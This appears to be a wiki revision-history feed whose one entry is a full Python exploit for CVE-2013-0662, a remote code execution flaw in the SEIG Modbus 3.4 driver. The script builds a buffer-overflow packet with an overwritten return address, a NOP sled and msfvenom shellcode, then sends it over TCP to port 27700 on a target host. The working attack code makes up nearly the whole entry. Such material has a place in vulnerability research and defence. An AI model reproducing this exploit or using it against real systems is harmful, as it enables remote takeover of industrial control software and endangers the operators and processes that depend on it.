<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2013-0662_SEIG_Modbus_3.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2013-0662 SEIG Modbus 3.4 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2013-0662_SEIG_Modbus_3.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2013-0662_SEIG_Modbus_3.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T14:23:28Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2013-0662_SEIG_Modbus_3.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1513&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Title: SEIG Modbus 3.4 - Remote Code Execution # Author: Alejandro Parodi # Date: 2018-08-17 # Vendor Homepage: https://www.schneider-electric.com # Software L...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2013-0662_SEIG_Modbus_3.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1513&amp;oldid=prev"/>
		<updated>2021-04-11T01:27:22Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Title: SEIG Modbus 3.4 - Remote Code Execution # Author: Alejandro Parodi # Date: 2018-08-17 # Vendor Homepage: https://www.schneider-electric.com # Software L...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Title: SEIG Modbus 3.4 - Remote Code Execution&lt;br /&gt;
# Author: Alejandro Parodi&lt;br /&gt;
# Date: 2018-08-17&lt;br /&gt;
# Vendor Homepage: https://www.schneider-electric.com&lt;br /&gt;
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4&lt;br /&gt;
# Version: v3.4&lt;br /&gt;
# Tested on: Windows XP SP3&lt;br /&gt;
# CVE: CVE-2013-0662&lt;br /&gt;
# References:&lt;br /&gt;
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662&lt;br /&gt;
 &lt;br /&gt;
import socket&lt;br /&gt;
import struct&lt;br /&gt;
 &lt;br /&gt;
ip = &amp;quot;192.168.127.138&amp;quot;&lt;br /&gt;
port = 27700&lt;br /&gt;
con = (ip, port)&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
####### MESSAGE ##########&lt;br /&gt;
message_header = &amp;quot;\x00\x64&amp;quot;&lt;br /&gt;
message_buffer = &amp;quot;A&amp;quot; * 0x5dc&lt;br /&gt;
eip = struct.pack(&amp;quot;&amp;lt;I&amp;quot;, 0x7C9C167D)&lt;br /&gt;
 &lt;br /&gt;
# Shellcode generated with:&lt;br /&gt;
# msfvenom -a x86 --platform windows -p windows/exec cmd=calc -e x86/xor_call4 -f python&lt;br /&gt;
# Shellcode Size: 189 bytes&lt;br /&gt;
nopsleed = &amp;quot;\x90&amp;quot; * 100 # \x90 bad char bypass&lt;br /&gt;
shellcode  = &amp;quot;\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53&amp;quot;&lt;br /&gt;
shellcode += &amp;quot;\xff\xd5\x63\x61\x6c\x63\x00&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
message = message_header + message_buffer + eip + nopsleed + shellcode&lt;br /&gt;
print &amp;quot;Message Len: &amp;quot; + hex(len(message)) + &amp;quot; bytes&amp;quot;&lt;br /&gt;
##########################&lt;br /&gt;
 &lt;br /&gt;
######## PKG HEADER ######&lt;br /&gt;
header_padding = &amp;quot;\x42\x42&amp;quot;&lt;br /&gt;
header_buf_size = &amp;quot;\xFF\xFF&amp;quot;&lt;br /&gt;
header_recv_len = struct.pack(&amp;quot;&amp;gt;H&amp;quot;, len(message))&lt;br /&gt;
header_end = &amp;quot;\x44&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
header = header_padding + header_buf_size + header_recv_len + header_end&lt;br /&gt;
##########################&lt;br /&gt;
 &lt;br /&gt;
######## CRAFTING PAYLOAD ########&lt;br /&gt;
payload = header + message&lt;br /&gt;
print &amp;quot;Package Len: &amp;quot;+hex(len(payload)) + &amp;quot; bytes&amp;quot;&lt;br /&gt;
##################################&lt;br /&gt;
 &lt;br /&gt;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;
s.connect(con)&lt;br /&gt;
s.send(payload)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>